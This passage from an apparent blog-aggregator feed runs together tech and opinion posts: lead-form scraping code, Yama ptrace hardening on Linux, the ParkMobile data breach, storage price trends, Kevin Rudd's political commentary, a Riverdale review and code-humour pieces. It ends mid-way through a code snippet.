(llelementphone=='ContactSubmission.Phone.Value') || (llelementphone=='ctl00$body$txtPhone') || (llelementphone=='p$lt$ctl03$pageplaceholder$p$lt$zoneCentre$editabletext$ucEditableText$widget1$ctl00$viewBiz$ctl00$Telephone$textbox') || (llelementphone=='ctl01_ctl00_pbForm1_ctl_phone_61f3') || (llelementphone=='ctl01$ctl00$ContentPlaceHolder1$ctl15$Phone') || (llelementphone=='p$lt$zoneContent$pageplaceholder$p$lt$zoneRightContent$contentText$ucEditableText$BizFormControl1$Bizform1$ctl00$Telephone$textbox') || (llelementphone=='ctl00$ctl00$ContentPlaceHolder$ContentPlaceHolder$ctl00$fPhone') || (llelementphone=='pagecolumns_0$form_B502CC1EC1644B38B722523526D45F36$field_6BCFC01A782747DF8E785B5533850EEB') || (llelementphone=='cf3_field_10') || (llelementphone=='r_phone') || (llelementphone=='c_phone') || (llelementphone=='cf-1[]') || (llelementphone=='frm_phone') || (llelementphone=='Patient_Phone_Number') || (llelementphone=='ctl00$PageContent$ctl00$txtPhone') || (llelementphone=='dnn$ctr398$FormMaster$ctl_6e49bedd138a4684a66b62dcb1a34658') || (llelementphone=='id_tel') || (llelementphone=='field_contact_tel[und][0][value]') || (llelementphone=='Phone:') || (llelementphone=='ContactPhone') || (llelementphone=='submitted[telephone]') || (llelementphone=='ctl00$ContentPlaceHolder1$ctl04$txtPhone') || (llelementphone=='ctl00$ContentPlaceHolder_pageContent$contact_phone') || (llelementphone=='264') || (llelementphone=='form_phone_number') || (llelementphone=='field8418998') || (llelementphone=='phoneTBox') || (llelementphone=='pagecontent_1$content_0$contentbottom_0$txtPhone') || (llelementphone=='application_0$PhoneTextBox') || (llelementphone=='submitted[phone_work]') || (llelementphone=='data[Lead][phone]') || (llelementphone=='a4475-telephone') || (llelementphone=='ctl00$Form$txtPhoneNumber') || (llelementphone=='signup_form_data[Phone]') || (llelementphone=='WorkPhone') || (llelementphone=='lldPhone') || (llelementphone=='web_form_1[field_102]value') || 
(llelementphone=='LeadGen_ContactForm_114694_m1832700:Phone') || (llelementphone=='phoneSalesForm') || (llelementphone=='fund_phone') || (llelementphone=='Phonepi_Phone') || (llelementphone=='field343') || (llelementphone=='cntnt01fbrp__48') || (llelementphone=='contact[phone]') || (llelementphone=='ctl00_ContentPlaceHolder1_ctl01_contactTelephoneBox_text') || (llelementphone=='ctl01$ctl00$ContentPlaceHolder1$ctl29$Phone') || (llelementphone=='plc$lt$content$pageplaceholder$pageplaceholder$lt$bodyColumnZone$LogilityContactUs$txtWorkPhone') || (llelementphone=='ctl00$ctl00$ctl00$cphBody$cphMain$cphMain$FormBuilder1$FormBuilderListView$ctrl4$FieldControl_Telephone') || (llelementphone=='ctl00$ctl00$ctl00$ContentPlaceHolderDefault$cp_content$ctl02$RenderForm_1$rpFieldsets$ctl00$rpFields$ctl04$126d33a3_9f7f_4583_8c94_5820d58fc030') || (llelementphone=='tx_powermail_pi1[uid1266]') || (llelementphone=='si_contact_ex_field3') || (llelementphone=='inc_contact1$txtPhone') || (llelementphone=='item2_tel_1') || (llelementphone=='LeadGen_ContactForm_15766_m0:Phone') || (llelementphone=='ctl00$ContentPlaceHolder1$txtPhone') || (llelementphone=='Default$Content$FormViewer$FieldsRepeater$ctl04$ctl00$ViewTextBox') || (llelementphone=='Default$Content$FormViewer$FieldsRepeater$ctl04$ctl00$ViewTextBox') || (llelementphone=='ctl00$SecondaryPageContent$C005$ctl00$ctl00$C002$ctl00$ctl00$textBox_write') || (llelementphone=='_u216318653597056311') || (llelementphone=='_u630018292785751084') || (llelementphone=='data[Contact][office_phone]') || (llelementphone=='ctl00$ctl00$cphMainContent$Content$txtPhone') || (llelementphone=='ctl00$ContentPlaceHolder1$txtTel') || (llelementphone=='item_5') || (llelementphone=='ques_21432') || (llelementphone=='phoneNum') || (llelementphone=='CONTACT_PHONE') || (llelementphone=='ff_nm_cf_phonetext[]') || (llelementphone=='WorkPhone') ) ) { llformphone = (document.forms[llformlooper2].elements[llelementlooper].value); if (llfrmid == debugid ) 
{alert('llformphone:'+llformphone+' llemailfound:'+llemailfound);} }

If the name property of the form element is equal to any one of the many many many items in this list, we can then extract the value and stuff it into a variable. And, since this will almost certainly break all the time, it's got a convenient "set the debugid and I'll spam alerts as I search the form".

Repeat this for every other field. It ends up being almost 2,000 lines of code, just to select the correct fields out of the forms.
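For contrast, the "easy solution" mentioned above, parameterizing the matching rules, might look roughly like this. The patterns, names, and helper function here are hypothetical illustrations, not part of the actual script:

```javascript
// Hypothetical sketch of a data-driven alternative: one table of
// name patterns per field type, instead of a hard-coded if-chain.
const fieldNamePatterns = {
  phone: [/^phone$/i, /^tel(ephone)?$/i, /phone[_-]?number/i],
  email: [/^e-?mail$/i],
};

// Return the value of the first form element whose name matches
// one of the patterns for the given field type, or "" if none does.
function findFieldValue(form, fieldType) {
  const patterns = fieldNamePatterns[fieldType] || [];
  for (const element of form.elements) {
    if (patterns.some((re) => re.test(element.name || ""))) {
      return element.value;
    }
  }
  return "";
}
```

Site-specific oddities, like the `ctl00$…` ASP.NET control names or the per-form-ID special cases, could then live in a per-customer configuration object rather than in two thousand lines of `||` clauses.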




I’ve just set up the Yama LSM module on some of my Linux systems. Yama controls ptrace, which is the debugging and tracing API for Unix systems. The aim is to prevent a compromised process from using ptrace to compromise other processes and cause more damage. In most cases a process that can ptrace another process (which usually means having capability SYS_PTRACE, i.e. being root, or having the same UID as the target process) can already interfere with that process in other ways, such as modifying its configuration and data files. But even so I think it has the potential to make things more difficult for attackers without making the system more difficult to use.

If you put “kernel.yama.ptrace_scope = 1” in sysctl.conf (or write “1” to /proc/sys/kernel/yama/ptrace_scope) then a user process can only trace its child processes. This means that “strace -p” and “gdb -p” will fail when run as non-root, but apart from that everything else will work. Generally “strace -p” (tracing the system calls of another process) is of most use to the sysadmin, who can do it as root. The command “gdb -p” and variants of it are commonly used by developers, so Yama wouldn’t be a good choice on a system that is primarily used for software development.

Another option is “kernel.yama.ptrace_scope = 3”, which means no process can ptrace another and the setting can’t be changed back without a reboot. This could be a good option for production servers that have no need for software development. It wouldn’t work well for a small server where the sysadmin needs to debug everything, but when dozens or hundreds of servers have their configuration rolled out via a provisioning tool this would be a good setting to include.

See Documentation/admin-guide/LSM/Yama.rst in the kernel source for the details.

When running with capability SYS_PTRACE (i.e. a root shell) you can ptrace anything else and, unless mode 3 has been set, disable Yama by writing “0” to /proc/sys/kernel/yama/ptrace_scope .
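The settings described above can be checked and applied like this (a sketch; the sysctl.d file name is arbitrary):

```shell
# Show the current mode (0 = classic, 1 = restricted, 3 = locked down)
cat /proc/sys/kernel/yama/ptrace_scope

# Enable restricted mode until the next reboot
sysctl -w kernel.yama.ptrace_scope=1

# Make it persistent across reboots
echo 'kernel.yama.ptrace_scope = 1' > /etc/sysctl.d/10-ptrace.conf
```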

I am enabling mode 1 on all my systems because I think it will make things harder for attackers while not making things more difficult for me.

Also note that SE Linux restricts SYS_PTRACE and also restricts cross-domain ptrace access, so the combination with Yama makes things extra difficult for an attacker.

Yama is enabled in the Debian kernels by default so it’s very easy to setup for Debian users, just edit /etc/sysctl.d/whatever.conf and it will be enabled on boot.

Krebs on SecurityParkMobile Breach Exposes License Plate Data, Mobile Numbers of 21M Users

Someone is selling account information for 21 million customers of ParkMobile, a mobile parking app that’s popular in North America. The stolen data includes customer email addresses, dates of birth, phone numbers, license plate numbers, hashed passwords and mailing addresses.

KrebsOnSecurity first heard about the breach from Gemini Advisory, a New York City based threat intelligence firm that keeps a close eye on the cybercrime forums. Gemini shared a new sales thread on a Russian-language crime forum that included my ParkMobile account information in the accompanying screenshot of the stolen data.

Included in the data were my email address and phone number, as well as license plate numbers for four different vehicles we have used over the past decade.

Asked about the sales thread, Atlanta-based ParkMobile said the company published a notification on Mar. 26 about “a cybersecurity incident linked to a vulnerability in a third-party software that we use.”

“In response, we immediately launched an investigation with the assistance of a leading cybersecurity firm to address the incident,” the notice reads. “Out of an abundance of caution, we have also notified the appropriate law enforcement authorities. The investigation is ongoing, and we are limited in the details we can provide at this time.”

The statement continues: “Our investigation indicates that no sensitive data or Payment Card Information, which we encrypt, was affected. Meanwhile, we have taken additional precautionary steps since learning of the incident, including eliminating the third-party vulnerability, maintaining our security, and continuing to monitor our systems.”

Asked for clarification on what the attackers did access, ParkMobile confirmed it included basic account information – license plate numbers, and if provided, email addresses and/or phone numbers, and vehicle nickname.

“In a small percentage of cases, there may be mailing addresses,” spokesman Jeff Perkins said.

ParkMobile doesn’t store user passwords, but rather it stores the output of a fairly robust one-way password hashing algorithm called bcrypt, which is far more resource-intensive and expensive to crack than common alternatives like MD5. The database stolen from ParkMobile and put up for sale includes each user’s bcrypt hash.

“You are correct that bcrypt hashed and salted passwords were obtained,” Perkins said when asked about the screenshot in the database sales thread.

“Note, we do not keep the salt values in our system,” he said. “Additionally, the compromised data does not include parking history, location history, or any other sensitive information. We do not collect social security numbers or driver’s license numbers from our users.”

ParkMobile says it is finalizing an update to its support site confirming the conclusion of its investigation. But I wonder how many of its users were even aware of this security incident. The Mar. 26 security notice does not appear to be linked to other portions of the ParkMobile site, and it is absent from the company’s list of recent press releases.

It’s also curious that ParkMobile hasn’t asked or forced its users to change their passwords as a precautionary measure. I used the ParkMobile app to reset my password, but there was no messaging in the app that suggested this was a timely thing to do.

So if you’re a ParkMobile user, changing your account password might be a pro move. If it’s any consolation, whoever is selling this data is doing so for an insanely high starting price ($125,000) that is unlikely to be paid by any cybercriminal to a new user with no reputation on the forum.

More importantly, if you used your ParkMobile password at any other site tied to the same email address, it’s time to change those credentials as well (and stop re-using passwords).

The breach comes at a tricky time for ParkMobile. On March 9, the European parking group EasyPark announced its plans to acquire the company, which operates in more than 450 cities in North America.

Cory DoctorowHow To Destroy Surveillance Capitalism (Part 02)

This week on my podcast, part two of a serialized reading of my 2020 Onezero/Medium book How To Destroy Surveillance Capitalism, now available in paperback (you can also order signed and personalized copies from Dark Delicacies, my local bookstore).



I’ve been watching the show Riverdale on Netflix recently. It’s an interesting modern take on the Archie comics. Having watched Josie and the Pussycats in Outer Space when I was younger I was anticipating something aimed towards a similar audience. As solving mysteries and crimes was apparently a major theme of the show I anticipated something along similar lines to Scooby Doo, some suspense and some spooky things, but then a happy ending where criminals get arrested and no-one gets hurt or killed while the vast majority of people are nice. Instead the first episode has a teen being murdered and Ms Grundy being obsessed with 15yo boys and sleeping with Archie (who’s supposed to be 15 but played by a 20yo actor).

Everyone in the show has some dark secret. The filming has a dark theme, the sky is usually overcast and it’s generally gloomy. This is a significant contrast to Veronica Mars which has some similarities in having a young cast, a sassy female sleuth, and some similar plot elements. Veronica Mars has a bright theme and a significant comedy element in spite of dealing with some dark issues (murder, rape, child sex abuse, and more). But Riverdale is just dark. Anyone who watches this with their kids expecting something like Scooby Doo is in for a big surprise.

There are lots of interesting stylistic elements in the show, with lots of clothing and uniform designs that seem to date from the 1940s. It seems like some alternate universe where kids have smartphones and laptops while dressing in the style of the 1940s. One thing that annoyed me was construction workers using tools like sledge-hammers instead of excavators. A society that has smartphones but no earth-moving equipment isn’t plausible.

On the upside there is a racial mix in the show that more accurately reflects American society than the original Archie comics did, and homophobia is much less common than in most parts of our society. The show treats both race and gay/lesbian issues in an accurate way (portraying some bigotry) while the main characters aren’t racist or homophobic.

I think it’s generally an OK show and recommend it to people who want a dark show. It’s a good show to watch while doing something on a laptop, so you can check Wikipedia for the references to 1940s things (like when bikinis were invented). I’m halfway through season 3, which isn’t as good as the first two; I don’t know whether it will get better later in the season or whether I should have stopped after season 2.

I don’t usually review fiction, but the interesting aesthetics of the show made it deserve a review.

MEStorage Trends 2021

The Viability of Small Disks

Less than a year ago I wrote a blog post about storage trends [1]. My main point in that post was that disks smaller than 2TB weren’t viable then and 2TB disks wouldn’t be economically viable in the near future.

Now MSY has 2TB disks for $72 and 2TB SSDs for $245, saving $173 if you get a hard drive (compared to saving $240 10 months ago). Given the difference in performance and noise, 2TB hard drives won’t be worth using for most applications nowadays.


Last year NVMe prices were very comparable to SSD prices, and I was hoping that trend would continue and SATA SSDs would go away. Now for sizes 1TB and smaller NVMe and SSD prices are very similar, but for 2TB the NVMe prices are twice those of SSDs – presumably partly due to poor demand for 2TB NVMe. There are also no NVMe devices larger than 2TB on sale at MSY (a store which caters to home use, not special server equipment) but SSDs go up to 8TB.

It seems that NVMe is only really suitable for workstation storage and for cache etc on a server. So SATA SSDs will be around for a while.

Small Servers

There are a range of low end servers which support a limited number of disks. Dell has 2 disk servers and 4 disk servers. If one of those had 8TB SSDs you could have 8TB of RAID-1 or 24TB of RAID-Z storage in a low end server. That covers the vast majority of servers (small business or workgroup servers tend to have less than 8TB of storage).
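The usable-capacity arithmetic behind those figures can be sketched quickly (this is only the arithmetic, not tied to any particular RAID implementation: mirroring gives one disk’s worth of space, and single-parity RAID-Z gives n-1 disks’ worth):

```java
// Back-of-envelope usable capacity for the small servers discussed above.
public class RaidCapacity {
    // RAID-1: every disk holds the same mirrored data, so usable
    // capacity is a single disk regardless of how many mirrors exist.
    static long raid1UsableTB(long diskTB, int disks) {
        return diskTB;
    }

    // RAID-Z (single parity): one disk's worth of space goes to parity.
    static long raidzUsableTB(long diskTB, int disks) {
        return diskTB * (disks - 1);
    }

    public static void main(String[] args) {
        // A 2-disk server with 8TB SSDs in RAID-1.
        System.out.println(raid1UsableTB(8, 2) + "TB usable"); // 8TB
        // A 4-disk server with 8TB SSDs in RAID-Z.
        System.out.println(raidzUsableTB(8, 4) + "TB usable"); // 24TB
    }
}
```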

Larger Servers

Anandtech has an article on Seagate’s roadmap to 120TB disks [2]. They currently sell 20TB disks using HAMR technology.

Currently the biggest disks that MSY sells are 10TB for $395, which was also the biggest disk they were selling last year. Last year MSY only sold SSDs up to 2TB in size (larger ones were available from other companies at much higher prices); now they sell 8TB SSDs for $949 (a 4* capacity increase in less than a year). Seagate is planning 30TB disks for 2023; if SSDs continue to increase in capacity by 4* per year we could have 128TB SSDs in 2023. If you needed a server with 100TB of storage then having 2 or 3 SSDs in a RAID array would be much easier to manage and faster than 4*30TB disks in an array.

When you have a server with many disks you can expect to have more disk failures due to vibration. One time I built a server with 18 disks, taking disks from 2 smaller servers that had 4 and 5 disks respectively. The 9 disks which had been working reliably for years started having problems within weeks of running in the bigger server. This is one of the many reasons for paying extra for SSD storage.

Seagate is apparently planning 50TB disks for 2026 and 100TB disks for 2030. If that’s the best they can do then SSD vendors should be able to sell larger products sooner at prices that are competitive. Matching hard drive prices is not required, getting to less than 4* the price should be enough for most customers.

The Anandtech article is worth reading, it mentions some interesting features that Seagate are developing such as having 2 actuators (which they call Mach.2) so the drive can access 2 different tracks at the same time. That can double the performance of a disk, but that doesn’t change things much when SSDs are more than 100* faster. Presumably the Mach.2 disks will be SAS and incredibly expensive while providing significantly less performance than affordable SATA SSDs.

Computer Cases

In my last post I speculated on the appearance of smaller cases designed to not have DVD drives or 3.5″ hard drives. Such cases still haven’t appeared apart from special purpose machines like the NUC that were available last year.

It would be nice if we could get a new industry standard for smaller power supplies. Currently power supplies are expected to be almost 5 inches wide (due to the expectation of a 5.25″ DVD drive mounted horizontally). We need some industry standards for smaller PCs that aren’t like the NUC; the NUC is very nice, but most people who build their own PC need more space than that. I still think that planning on USB DVD drives is the right way to go. I’ve got 4 PCs in my home that are regularly used, and CDs and DVDs are used so rarely that sharing a single DVD drive among all 4 wouldn’t be a problem.


I’m tempted to get a couple of 4TB SSDs for my home server which cost $487 each, it currently has 2*500G SSDs and 3*4TB disks. I would have to remove some unused files but that’s probably not too hard to do as I have lots of old backups etc on there. Another possibility is to use 2*4TB SSDs for most stuff and 2*4TB disks for backups.

I’m recommending that all my clients only use SSDs for their storage. I only have one client with enough storage that disks are the only option (100TB of storage) but they moved all the functions of that server to AWS and use S3 for the storage. Now I don’t have any clients doing anything with storage that can’t be done in a better way on SSD for a price difference that’s easy for them to afford.

Affordable SSD also makes RAID-1 in workstations more viable. 2 disks in a PC is noisy if you have an office full of them and produces enough waste heat to be a reliability issue (most people don’t cool their offices adequately on weekends). 2 SSDs in a PC is no problem at all. As 500G SSDs are available for $73 it’s not a significant cost to install 2 of them in every PC in the office (more cost for my time than hardware). I generally won’t recommend that hard drives be replaced with SSDs in systems that are working well. But if a machine runs out of space then replacing it with SSDs in a RAID-1 is a good choice.

Moore’s law might cover SSDs, but it definitely doesn’t cover hard drives. Hard drives have fallen way behind developments of most other parts of computers over the last 30 years, hopefully they will go away soon.

Kevin RuddBBC Breakfast: HRH Prince Philip

12 APRIL 2021

The post BBC Breakfast: HRH Prince Philip appeared first on Kevin Rudd.

Kevin RuddThe Guardian: Australia’s vaccination rollout strategy has been an epic fail. Now Scott Morrison is trying to gaslight us

Australians should be proud of their success in suppressing and eliminating coronavirus so far. This is largely due to the efforts of state governments – Labor and Liberal – in containing local outbreaks through a combination of mandatory quarantines, temporary lockdowns and effective contact tracing. And the Australian people themselves have played the biggest part by making this strategy of containment, and eventual elimination, work.

The same cannot be said of the federal government’s vaccination strategy where they have politically trumpeted their success. The daily reality of the vaccination rollout strategy reveals a litany of policy and administrative failures.

Thirteen months into the Covid-19 crisis, the states collectively get a strong B-plus on virus containment; whereas the federal government gets a D-minus on its vaccine rollout.

With the states constitutionally responsible for most of the public health response, Scott Morrison’s main role was: to secure in advance sufficient international and domestic vaccine supply; to do so from multiple vaccine developers to mitigate against the risks of individual vaccines failing; and to organise in advance a distribution strategy that would get the vaccine to the people as rapidly as possible.

On this core responsibility, Morrison has failed. His strategy, once again, is a political strategy. It has been to blame others – the states on delivery and the Europeans on supply.

Ultimately, the delivery of an effective vaccine to the people is the only effective long-term guarantee on a return to public health normality – and therefore economic normality, including the opening of our international borders.

We are now in a race against time to immunise our population, overcome this virus, and start the task of rebuilding from the pandemic. However, five months after Morrison announced Australians were “at the front of the queue” for vaccination, our rollout is presently ranked 104th in the world – sandwiched between Lebanon and Bangladesh – based on the latest seven-day average vaccination rate. This is a national disgrace.

Australians understand this is a race. It is a race between our vaccination rollout to eliminate the virus from our shores, and the rolling risk of the virus mutating. We are reminded of this every time the virus leaks out of hotel quarantine, and whenever we read heart-wrenching stories out of India or Brazil. We understand it when we learn about deadlier and more infectious variants emerging overseas that threaten not only those countries, but the roughly 36,000 stranded Australians who are still trickling home months too late. Each extra day they spend waiting for a quarantine place is another day they risk being exposed to a new variant they could bring back to Australia.

At present, we do not know when all Australians will be vaccinated against Covid-19. We don’t even know when all of our frontline doctors, nurses and quarantine workers will be vaccinated.

Early warnings that Australia should diversify its vaccine portfolio and avoid putting too many eggs in the AstraZeneca basket have been proven right.

And despite the prime minister telling us he has “secured” more Pfizer vaccines, to be delivered sometime around Christmas, the truth is no shipment is truly secure until it has arrived and is ready for use.

The truth is we now have no vaccine strategy for half the country this year. Many countries will probably finish rolling out their vaccines before millions of us even get our first shot.

The early perceived political “successes” in Australia’s handling of the virus appear to have induced on Morrison’s part a breathtaking level of political complacency on vaccination strategy that borders on professional negligence. Morrison’s inner circle seem to inhabit an alternate reality. The key decision-makers (many of whom, it seems, have already been vaccinated) insist there is no race at all.

Despite earlier doubling down on unrealistic targets, Morrison now tries to gaslight Australians by claiming he didn’t actually say what we all heard him say. That we would be at the “front of the queue”, that we had access to the best vaccines in the world, and that we would have four million vaccinations done by the end of March. All bullshit.

So what could the prime minister now do? First, Morrison should own up to his responsibilities. Doctors can give excellent medical advice, but they aren’t necessarily experienced at public sector management, international diplomacy or working out how and when vaccines will be delivered to surgeries. Morrison’s job is to ensure that his health bureaucracy has a clear, workable communications plan with the nation’s medical workforce on vaccine distribution.

At the same time, Morrison should recognise that his own hyperactive political messaging is actually eroding the public’s confidence rather than boosting it.

One lesson from the pandemic’s first wave was that many Australians felt far more reassured by straight-talkers than evasive ministers and officials. Public confidence in the vaccination program isn’t eroded by people asking reasonable questions, but by the failure of governments to give straight and factual answers. Morrison and his officials could inspire more confidence if they were less shifty, more candid or simply vacated the public communications space entirely to the chief medical officer.

Second, Australia might look to the United States, which is weeks away from producing a surplus of vaccines. After a century of alliance, partnership and camaraderie, Washington may be able to provide a top-up to at least help vaccinate our most vulnerable frontline workers with the best vaccines available.

Third, we should be learning from our friends and allies about their experiences running mass vaccination centres. One of the major challenges associated with the shift to Pfizer from AstraZeneca is that it requires colder storage facilities and, perhaps most significantly, it requires the second shot to be given about three weeks after the first (rather than about three months for AstraZeneca). The government’s plan A – to mass-vaccinate millions through GP clinics and pharmacies – always seemed far-fetched. It seems inevitable that we may now need to pivot to mass vaccination centres like those in the US.

Fourth, the government must overhaul its local production effort. The pharmaceutical industry is reportedly rife with stories of Australian officials not answering correspondence, not returning phone calls and being generally uninterested in discussing vaccine purchases until several months into the pandemic, by which time those companies had promised billions of doses to other countries.

The same attitudes appear to have driven the government’s approach to our own country’s local mRNA experts. As the Guardian reported last week, “Frustrated experts say Australia could already be producing mRNA Covid vaccines if it had acted earlier”. Any sensible government would have been moving heaven and earth to help make this happen months ago, but not Morrison it would seem.

Australians are not fools. They understand just how vulnerable we remain. And we all know that waiting until Christmas isn’t good enough. As the actor David Wenham tweeted after Morrison’s press conference on Friday, “I just rang my local Priceline pharmacy and ordered 100 million doses of Pfizer vaccine. This is great news and puts Australia at the front of the queue again.” And David, as we all know, is a better actor than Scotty from Marketing will ever be.

First published in The Guardian

Image: Mike Bowers/The Guardian

The post The Guardian: Australia’s vaccination rollout strategy has been an epic fail. Now Scott Morrison is trying to gaslight us appeared first on Kevin Rudd.

Worse Than FailureCodeSOD: Exceptionally General

Andres noticed this pattern showing up in his company's code base, and at first didn't think much of it:

try
{
    /*code here*/
}
catch (Exception ex)
{
    ExceptionManager.HandleException(ex);
    throw ex;
}

It's not uncommon to have some sort of exception handling framework, maybe some standard logging, or the like. And even if you're using that, it may still make sense to re-throw the exception so another layer of the application can also handle it. But there was just something about it that got Andres's attention.

So Andres did what any curious programmer would do: checked the implementation of HandleException.

public static Exception HandleException(Exception ex)
{
    if (ex is ArgumentException)
        return new InvalidOperationException("(ExceptionManager) Ocurrió un error en el argumento.");
    if (ex is ArgumentOutOfRangeException)
        return new InvalidOperationException("(ExceptionManager) An error ocurred because of an out of range value.");
    if (ex is ArgumentNullException)
        return new InvalidOperationException("(ExceptionManager) On error ocurred tried to access a null value.");
    if (ex is InvalidOperationException)
        return new InvalidOperationException("(ExceptionManager) On error ocurred performing an invalid operation.");
    if (ex is SmtpException)
        return new InvalidOperationException("(ExceptionManager)An error ocurred trying to send an email.");
    if (ex is SqlException)
        return new InvalidOperationException("(ExceptionManager) An error ocurred accessing data.");
    if (ex is IOException)
        return new InvalidOperationException("(ExceptionManager) An error ocurred accesing files.");
    return new InvalidOperationException("(ExceptionManager) An error ocurred while trying to perform the application.");
}

So, what this code is trying to do is bad: it wants to destroy all the exception information and convert actual meaningful errors into generic InvalidOperationExceptions. If this code did what it intended to do, it'd be destroying the backtrace, concealing the origin of the error, and making the application significantly harder to debug.

Fortunately, this code actually doesn't do anything. It constructs the new objects, and returns them, but that return value isn't consumed, so it just vanishes into the ether. Then our actual exception handler rethrows the original exception.

The old saying is "no harm, no foul", and while this doesn't do any harm, it's definitely quite foul.
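For what it's worth, if a translation layer like this were actually wanted, the conventional pattern is to pass the original exception along as the inner exception, so nothing is lost. A minimal sketch in Java, whose `cause` mechanism mirrors C#'s inner-exception constructor (`new InvalidOperationException(message, ex)`); the names here are illustrative, not from the original code:

```java
// Sketch: translating exceptions to friendlier messages WITHOUT
// destroying the original error information. The original exception
// travels along as the cause, so its stack trace survives.
public class ExceptionTranslator {
    static RuntimeException translate(Exception ex) {
        String msg = (ex instanceof IllegalArgumentException)
                ? "(ExceptionTranslator) An error occurred in an argument."
                : "(ExceptionTranslator) An unexpected error occurred.";
        // The second constructor argument preserves the original exception.
        return new RuntimeException(msg, ex);
    }

    public static void main(String[] args) {
        RuntimeException wrapped =
                translate(new IllegalArgumentException("bad value"));
        System.out.println(wrapped.getMessage());
        // The original error and its backtrace are still reachable:
        System.out.println(wrapped.getCause().getMessage());
    }
}
```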

[Advertisement] Continuously monitor your servers for configuration changes, and report when there's configuration drift. Get started with Otter today!


Kevin RuddBBC World: HRH Prince Philip

9 APRIL 2021

Topic: His Royal Highness Prince Philip, the Duke of Edinburgh

The post BBC World: HRH Prince Philip appeared first on Kevin Rudd.

Kevin RuddBBC Newsnight: HRH Prince Philip

9 APRIL 2021

Topic: His Royal Highness Prince Philip, the Duke of Edinburgh

The post BBC Newsnight: HRH Prince Philip appeared first on Kevin Rudd.


Kevin RuddStatement: HRH The Duke of Edinburgh

Thérèse and I are deeply saddened by the news of the death of His Royal Highness Prince Philip.

We would like to extend our deepest condolences to his lifelong partner Her Majesty The Queen, and other members of the Royal Family.

Prince Philip lived to a venerable age. Both Thérèse and I had the opportunity to meet and converse with both His Royal Highness and Her Majesty on a number of occasions. It was plain from those conversations that Prince Philip had a deep and abiding affection for Australia.

It matters not whether Australians are republicans or monarchists, Prince Philip’s passing is a very sad day for the Royal Family who, like all families, will be grieving deeply the loss of a loving husband, father, grandfather, and great-grandfather.

Our thoughts should all be with Her Majesty The Queen at this time.

Image: ABC / Her Royal Highness Queen Elizabeth II and the Duke of Edinburgh on Royal train at Bathurst, NSW, while on tour, February 1954.

The post Statement: HRH The Duke of Edinburgh appeared first on Kevin Rudd.

Cryptogram Friday Squid Blogging: Squid-Shaped Bike Rack

There’s a new squid-shaped bike rack in Ballard, WA.

As usual, you can also use this squid post to talk about the security stories in the news that I haven’t covered.

Read my blog posting guidelines here.

Cryptogram Friday Squid Blogging: Blobs of Squid Eggs Found Near Norway

Divers find three-foot “blobs” — egg sacs of the squid Illex coindetii — off the coast of Norway.

As usual, you can also use this squid post to talk about the security stories in the news that I haven’t covered.

Read my blog posting guidelines here.

Cryptogram Friday Squid Blogging: Jurassic Squid and Prey

A 180-million-year-old Vampire squid ancestor was fossilized along with its prey.

As usual, you can also use this squid post to talk about the security stories in the news that I haven’t covered.

Read my blog posting guidelines here.

Kevin RuddSubmission: Parliamentary Petitions

In February 2021, I made a written submission to the Australian House of Representatives Inquiry into aspects of its petitioning system.

The Inquiry was launched following technological failures by the Department of Parliamentary Services which resulted in many thousands of Australians being unable to sign the Petition for a Royal Commission to ensure the strength and diversity of Australian news media.

The Inquiry is also examining a malicious cyberattack on that petition by a right-wing activist, inspired by a segment he saw on Murdoch’s Sky News.

Click here to read my submission.

The post Submission: Parliamentary Petitions appeared first on Kevin Rudd.

Worse Than FailureError'd: Punfree Friday

Today's Error'd submissions are not so much WTF as simply "TF?" Please try to explain the thought process in the comments, if you can.

Plaid-hat hacker Mark writes "Just came across this for a Microsoft Security portal. Still trying to figure it out." Me, I just want to know what happens when you click "Audio".


Reader Wesley faintly damns the sender "Hey, at least they are being honest!" But is this real, or is it a phishing scam? And if it's real phishing, can it really be honest?


Surveyed David misses last week's trivial "None of the above". So do I, David.


Diligently searching, keyboard sleuth Paul T suspects his None key might be somewhere near his Any key, but he can't find that one either.


Finally, an EU resident who wishes to remain anonymous has warned us "Vodafone doesn't allow IT jokes to kids... And they might be right". Where did we go wrong, Vodafone nannies? Was it the C++?


[Advertisement] BuildMaster allows you to create a self-service release management platform that allows different teams to manage their applications. Explore how!


Worse Than FailureCodeSOD: A True Leader's Enhancement

Chuck had some perfectly acceptable C# code running in production. There was nothing terrible about it. It may not be the absolute "best" way to build this logic in terms of being easy to change and maintain in the future, but nothing about it is WTF-y.

if (report.spName == "thisReport" || report.spName == "thatReport")
{
    LoadUI1();
}
else if (report.spName == "thirdReport" || report.spName == "thirdReportButMoreSpecific")
{
    LoadUI2();
}
else
{
    LoadUI3();
}

At worst, we could argue that using string-ly typed logic for deciding the UI state is suboptimal, but this code is hardly "burn it down" bad.

Fortunately, Chuck's team leader didn't like this code. So that team leader "fixed" it.

if ("thisReport, thatReport".Contains(report.spName))
{
    LoadUI1();
}
else if ("thirdReport, thirdReportButMoreSpecific".Contains(spName))
{
    LoadUI2();
}
else
{
    LoadUI3();
}

So we keep the string-ly typed logic, but instead of straight equality comparisons, we change it into a Contains check. A Contains check on a string which contains all the possible report names, as a comma-separated list. Not only is it less readable and significantly slower, but if spName is an invalid value, we might get some fun, unexpected results.
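Those unexpected results are easy to demonstrate: any substring of the list, including the empty string, slips through. A sketch in Java (names illustrative) contrasting the substring check with a proper membership test:

```java
import java.util.Set;

// Sketch: why a substring check over a comma-separated list is not a
// membership test.
public class ReportCheck {
    // The team leader's approach: substring search over one big string.
    static boolean substringCheck(String spName) {
        return "thisReport, thatReport".contains(spName);
    }

    // An actual membership test against the allowed names.
    static boolean membershipCheck(String spName) {
        return Set.of("thisReport", "thatReport").contains(spName);
    }

    public static void main(String[] args) {
        System.out.println(substringCheck("Report"));  // true - wrong UI!
        System.out.println(substringCheck(""));        // true - also "matches"
        System.out.println(membershipCheck("Report")); // false - as intended
    }
}
```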

Perhaps the team lead was going for an ["array", "of", "allowed", "names"] and missed?

The end result though is that this change definitely made the code worse. The team lead, though, doesn't get their code reviewed by their peers. They're the leader, they have no peers, clearly.

[Advertisement] Utilize BuildMaster to release your software with confidence, at the pace your business demands. Download today!


Worse Than FailureCodeSOD: We All Expire

Code, like anything else, ages with time. Each minor change we make to a piece of already-in-use software speeds up that process. And while a piece of software can be running for decades unchanged, its utility will still decline over time, as its user interface becomes more distant from common practices, as the requirements drift from their intent, and people forget what the original purpose of certain features even was.

Code ages, but some code is born with an expiration date.

For example, at Jose's company, each year is assigned a letter label. The reasons are obscure, and rooted in somebody's project planning process, but the year 2000 was "A". The year 2001 was "B", and so on. 2025 would be "Z", and then 2026 would roll back over to "A".

At least, that's what the requirement was. What was implemented was a bit different.

if DateTime.Today.year = 2010 then
    year = "K"
else if DateTime.Today.year = 2011 then
    year = "L"
